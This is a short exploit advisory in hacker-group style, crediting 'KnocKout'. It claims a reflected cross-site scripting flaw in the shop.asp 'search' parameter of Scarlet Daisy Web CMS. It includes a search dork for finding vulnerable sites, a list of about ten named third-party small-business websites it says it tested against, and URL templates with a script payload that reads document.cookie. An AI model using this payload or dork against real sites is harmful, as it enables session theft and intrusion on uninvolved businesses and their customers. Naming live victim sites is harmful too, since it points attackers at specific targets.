Scarlet Daisy Web CMS <= Reflected XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz: DaiMon, PRoMaX, _UnDeRTaKeR_ , BackDoor Septemb0x , BARCOD3 , ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~App. : Scarlet Daisy Web Web Content Management System. |~Software: http://www.scarletdaisy.com |~Vulnerability Style : Cross Site Scripting |[~]Date : "09.12.2014" |[~]Tested on : Kali Linux |[Keywords/DORK]: "Powered by Scarlet Daisy Web Content Management System." ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Tested on http://www.scarletdaisy.com http://www.crossstitchworkshop.co.uk http://www.camelotcandlesupplies.co.uk http://www.claymorehomes.co.uk http://www.papiransky.co.uk http://www.sfp-ifa.co.uk http://www.hattongarage.co.uk http://www.j-a-c-k.org http://ahnaylortextiles.co.uk http://www.ladymire.co.uk .. .. ==============[INFO]====================================== shop.asp 'search' parameter is not safe. harmful character, they should be filtered. ==============[Exploitation]============================== HTTP://[VICTIM]/shop.asp?action=form&search= POST: [Cross Site Scripting] HTTP://[VICTIM]/shop.asp?search= POST: [Cross Site Scripting] HTTP://[VICTIM]/shop.asp?action=form&search=<b>HI WORLD</b>"><script>alert(document.cookie)</script>